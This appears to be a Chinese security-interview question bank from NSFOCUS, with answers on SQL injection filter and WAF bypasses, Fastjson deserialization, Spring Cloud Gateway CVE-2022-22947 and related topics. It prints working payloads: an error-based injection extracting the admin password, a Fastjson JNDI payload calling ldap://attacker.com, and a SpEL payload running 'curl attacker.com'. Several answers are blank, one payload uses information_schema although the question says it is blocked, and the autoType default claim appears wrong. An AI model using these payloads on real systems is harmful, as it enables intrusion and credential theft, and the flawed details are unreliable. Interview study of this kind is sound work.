绿盟面试题 - 技术栈

题目：某登录系统存在SQL注入漏洞，但过滤了'、"、空格和union关键字，如何绕过并获取管理员密码？
答案：

绕过引号：使用十六进制编码（0x61646D696E代替'admin'）或宽字节注入（%bf%27）；
绕过空格：用/**/或%0a代替；
绕过union：使用盲注（布尔/时间盲注）或报错注入（extractvalue(1,concat(0x7e,(select user())))）；
利用示例：admin'^extractvalue(1,concat(0x7e,(select substr(password,1,20) from users where username=0x61646D696E)))%23
修复方案：预编译（PreparedStatement）+ 白名单过滤。

题目：在GitHub公开代码中发现某云厂商的AK/SK，如何快速验证并扩大攻击面？
答案：

题目：如何利用Fastjson ≤1.2.24的反序列化漏洞实现RCE？给出利用链及限制条件。
答案：

利用链 ：JdbcRowSetImpl + JNDI注入（需出网）；
Payload：

{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://attacker.com/Exploit","autoCommit":true}
限制条件 ：目标需开启autoType功能（默认关闭）；
修复方案 ：升级至1.2.83+，关闭autoType，使用安全模式。

题目：审计以下代码，指出漏洞并说明利用方式：

复制代码

String cmd = request.getParameter("cmd");
Runtime.getRuntime().exec(cmd);

答案：

题目：如何利用Shiro的RememberMe功能实现反序列化攻击？给出关键步骤。
答案：

题目：简述CVE-2022-22947的利用条件及攻击步骤。
答案：

1. 添加恶意路由：POST /actuator/gateway/routes/test，Body包含SpEL表达式（如T(java.lang.Runtime).getRuntime().exec("curl attacker.com")）；
2. 刷新路由：POST /actuator/gateway/refresh；
3. 访问路由触发RCE。
  修复方案：升级Spring Cloud Gateway至3.1.1+，禁用Actuator接口。

题目：某WAF拦截了UNION SELECT和information_schema，如何获取数据库名？
答案：

替代information_schema：使用sys.schema_auto_increment_columns（MySQL 5.6+）；
绕过UNION：利用报错注入或布尔盲注；
Payload示例：

' AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT database()),0x7e,FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) --+

修复方案：使用ORM框架+参数化查询，禁用错误回显。